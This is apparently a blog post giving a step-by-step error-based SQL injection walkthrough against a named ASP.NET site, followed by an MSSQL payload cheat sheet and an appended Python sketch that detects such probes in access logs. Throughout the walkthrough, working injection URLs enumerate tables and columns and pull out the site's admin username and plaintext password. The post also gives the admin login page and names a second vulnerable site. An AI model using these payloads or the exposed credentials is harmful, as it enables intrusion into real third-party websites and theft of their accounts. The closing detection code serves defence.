Aug 15, 2015
sqli aspx
Victim: http://quangcaovinasun.com.vn
Step 1: Check the link for the error
For aspx sites, we append a ' to the end of a link that contains parameters such as ID=, Sp=…. If the site shows the error:
Unclosed quotation mark after the character string ''
this shows the site is vulnerable to SQLi.
Example: http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42'
Step 2: Query the table names
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
The name of the first table appears: "tbl_DangNhap".
Conversion failed when converting the nvarchar value 'tbl_DangNhap' to data type int.
Continue querying:
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')))-- -
Conversion failed when converting the nvarchar value 'tbl_DiaChi' to data type int.
Continue:
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap','tbl_DiaChi' )))-- -
Conversion failed when converting the nvarchar value 'tbl_DoiTac' to data type int.
Do the same until the user table containing the username and password appears. On this site, the table holding the admin's login information is the first table: Tbl_DangNhap
Step 3: Query the column names
As found above, the table containing the username and password is tbl_DangNhap, so that is the table we will exploit.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- -
Conversion failed when converting the nvarchar value 'ID' to data type int.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID')))-- -
Conversion failed when converting the nvarchar value 'TenDN' to data type int.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID','TenDN')))-- -
Conversion failed when converting the nvarchar value 'Matkhau' to data type int.
Step 4: Extract the username and password
- Username:
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN from tbl_DangNhap))-- -
Conversion failed when converting the nvarchar value 'loimv' to data type int.
- Password:
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 Matkhau from tbl_DangNhap))---
Conversion failed when converting the nvarchar value 'maihoanglinh@' to data type int
- Or get both the username and the password:
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 TenDN%2b'/'%2bMatkhau from tbl_DangNhap))-- -
Conversion failed when converting the nvarchar value 'loimv/maihoanglinh@' to data type int
Step 5: Find the admin link and log in
Use the havij tool or web admin finder, which were introduced in part 2:
http://ducdung08clc.blogspot.com/2012/03/v-behaviorurldefaultvmlo.html
We get the admin link:
http://quangcaovinasun.com.vn/admin/Default.aspx
admin: loimv
password: maihoanglinh@
A site exploited the same way:
http://www.sacotour.vn/Chi-tiet-tour.aspx?idtour=88
Summary: SQLi Queries for Aspx Worth Noting
1- Get the version:
and 1=convert(int,@@version)-- -
2- Get Server Name
and 1=convert(int,@@servername)-- -
3- Get data base name:
and 1=convert(int,db_name())-- -
4- Get system user
and 1=convert(int,system_user) -- -
5- Get the first table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
6- Get the second table:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -
7- Get the third table:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -
8- Keep going until you reach the user table, to get the admin's login information
10- Get the first column from the table containing admin:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -
11- Get the second column from the table containing admin:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("FIRST-COLUMNS-HERE")))-- -
12- Continue until you have all the columns whose information is needed
13- Output the username and password
and 1=convert(int,(select top 1 column-name-1%2b’/’%2bcolumn-name-2 from TABLE-NAME-HERE))-- -
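How the Step 1 quote probe and the queries in this list show up in web server access logs, as a defender-side detection sketch; this is an added example, not code from the original post. The four-field log format, the sample lines, the client addresses and the rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Markers of the error-based MSSQL probes listed on this page, matched
# against URL-decoded query-parameter values. Rule names are illustrative.
RULES = [
    ("convert-int-probe", re.compile(r"convert\s*\(\s*int\s*,", re.I)),
    ("schema-enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("server-variable", re.compile(r"@@(version|servername)|db_name\s*\(|system_user", re.I)),
    ("subselect", re.compile(r"\(\s*select\s+top\s+\d+", re.I)),
    ("trailing-comment", re.compile(r"--[\s-]*$")),
    ("quote-probe", re.compile(r"^[\w.-]*['\u2018\u2019]$")),
]
WEAK = {"quote-probe", "trailing-comment"}  # noisy on their own

# Constructed sample: "client method url status", URLs still percent-encoded.
SAMPLE_LOG = [
    "198.51.100.7 GET /ProductDetail.aspx?MaSP=42 200",
    "192.0.2.10 GET /ProductDetail.aspx?MaSP=42%27 500",
    "192.0.2.10 GET /ProductDetail.aspx?MaSP=42%20and%201=convert(int,@@version)--%20- 500",
    "192.0.2.10 GET /ProductDetail.aspx?MaSP=42+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+- 500",
    "198.51.100.7 GET /Search.aspx?q=o%27brien+convert 200",  # benign apostrophe
]

def inspect_url(url):
    """Return {parameter: [rule names]} for each parameter that matches."""
    hits = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        matched = [rule for rule, rx in RULES if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits

def scan_log(lines):
    """Group matching requests by client and grade them."""
    clients = defaultdict(lambda: {"requests": 0, "rules": set(), "errors_returned": 0})
    for line in lines:
        ip, _method, url, status = line.split()
        matched = {r for rules in inspect_url(url).values() for r in rules}
        if not matched:
            continue
        entry = clients[ip]
        entry["requests"] += 1
        entry["rules"] |= matched
        entry["errors_returned"] += status == "500"  # error page reached the client
    for entry in clients.values():
        entry["severity"] = "high" if entry["rules"] - WEAK else "low"
    return dict(clients)
```

Detection only shows that probing happened; the fix is to bind MaSP as a typed query parameter and to stop returning raw SQL Server error text to the client.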